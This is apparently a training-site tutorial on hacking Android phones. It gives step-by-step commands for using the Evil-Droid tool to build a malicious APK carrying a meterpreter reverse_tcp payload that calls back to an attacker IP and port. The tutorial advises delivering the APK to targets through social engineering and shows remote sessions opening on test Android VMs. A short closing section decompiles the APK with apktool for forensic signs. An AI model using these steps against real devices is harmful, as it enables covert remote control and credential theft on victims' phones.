Generate Android APP in 2 mins and hack any Android mobile

Android is an open-source platform where any individual developer can implement ideas into an Android application. It’s a big advantage for Android developers as well as users who can use tons of applications according to their needs. Android does offer many features but the most vulnerable also. Android do have lot of vulnerabilities which gives an attacker advantage to steal credentials of the target. According to CVE (Common Vulnerability Exposures) android have many vulnerabilities which can be used to bypass android security was demonstrated in the ethical hacking courses offered by International Institute of Cyber Security.

CVE shows many vulnerabilities which are mostly used by attackers. Today we will show a tool called Evil Droid which is used to create different payloads to compromise android device. Ethical hacking researcher of international institute of cyber security says this Evil-droid can be used to generates malicious apk to penetrate android devices.

• Evil-Droid has been installed on Kali Linux 2018.4 amd64.
• For cloning type git clone https://github.com/M4sc3r4n0/Evil-Droid.git
• Type cd Evil-Droid
• Type chmod u+x evil-droid

• Type ./evil-droid

======================SNIP========================

• Type 1
• To start APK MSF

• Type local IP address (attacker’s IP address) Type 192.168.1.5

• Type the port number to listen Type 4444

• Type malicious apk name. Type testapk

• Select android/meterpreter/reverse_tcp

• Select Multi handler

• Then click on OK

• Evil-droid has created a malicious app. Now you can send apps to the target by social engineering.
• For testing, we have used Android 4.4 iso. Download Android 4.4 from: https://sourceforge.net/projects/android-x86/files/latest/download
• We have started live boot in the Vmware workstation.
• Install the malicious test apk into the Android 4.4
• Before installing it will ask for to accept unknown sources to be on. Turn on Unknown sources & then install test.apk

• As test.apk is opened in the android.

• A session will be created in Evil-droid listener. Another terminal will open automatically for creating & running session.

• The evil-droid meterpreter offers the same commands as the Metasploit meterpreter. You can easily manipulate your target.
• For another test, we have used Android 7.1 iso.
  Download Android 7.1 from: https://osdn.net/projects/android-x86/downloads/67834/android-x86_64-7.1-r2.iso/
• We have started live boot in the Vmware workstation.
• Install the malicious test apk into the Android 7.1
• Before installing it will ask for to accept unknown sources to be on. Turn on Unknown sources & then install test.apk.

• As test.apk is opened in the Android.

• A session will be created in Evil-droid Listener.
• Another terminal will open automatically for creating & running session.

• The evil-droid meterpreter offers the same commands as the Metasploit meterpreter. You can easily manipulate your target.

The same exploitation to Android devices can be done using FATRAT, to understand how it works follow to hack Windows, Android, and Mac using the Fatrat step-by-step tutorial

REVERSING MALICIOUS APK GENERATED BY EVIL-DROID:-

For doing reverse engineering of any Android application various tools are used to decompile APKs, according to ethical hacking experts. But the most popular decompiler known as apktool is used to decompile Android applications. We have used apktool which comes pre-installed in Kali Linux 2018.4 (amd64).

• Open another terminal type apktool -h

root@kali:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com/jpzqkxcarh/zsehpukvxy# apktool -h
 Unrecognized option: -h
 Apktool v2.2.2 - a tool for reengineering Android apk files
 with smali v2.1.3 and baksmali v2.1.3
 Copyright 2014 Ryszard Wiśniewski [email protected]
 Updated by Connor Tumbleson [email protected]
 usage: apktool
  -advance,--advanced   prints advance information.
  -version,--version    prints the version then exits
 usage: apktool if|install-framework [options] 
  -p,--frame-path 
   Stores framework files into .
  -t,--tag           Tag frameworks using .
 usage: apktool d[ecode] [options] 
  -f,--force              Force delete destination directory.

• Type apktool d evil.apk

root@kali:/home/iicybersecurity/Downloads/Evil-Droid# apktool d evil.apk
 I: Using Apktool 2.2.2 on evil.apk
 I: Loading resource table…
 I: Decoding AndroidManifest.xml with resources…
 I: Loading resource table from file: 
 I: Regular manifest package…
 I: Decoding file-resources…
 I: Decoding values / XMLs…
 I: Baksmaling classes.dex…
 I: Copying assets and libs…
 I: Copying unknown files…
 I: Copying original files…/root/.local/share/apktool/framework/1.apk

• After executing the above query apktool has extracted malicious apk into a set of XMLs. These XMLs are used in forensics.
• When we analyzed further we found that malicious APK-created directories with jumbled/random alphabet names. If you scan any normal application it will not create any random directories with such names. This behavior shows the presence of a malicious apk.

 root@kali:/home/iicybersecurity/Downloads/Evil-Droid# cd /evil/smali/com
root@kali:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com# ls
 jpzqkxcarh